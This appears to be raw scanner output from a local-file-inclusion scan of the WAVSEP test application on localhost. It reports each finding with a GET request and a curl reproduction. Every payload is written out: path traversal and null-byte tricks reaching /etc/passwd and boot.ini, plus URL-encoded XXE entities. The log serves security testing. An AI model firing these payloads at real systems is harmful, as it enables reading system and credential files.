curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
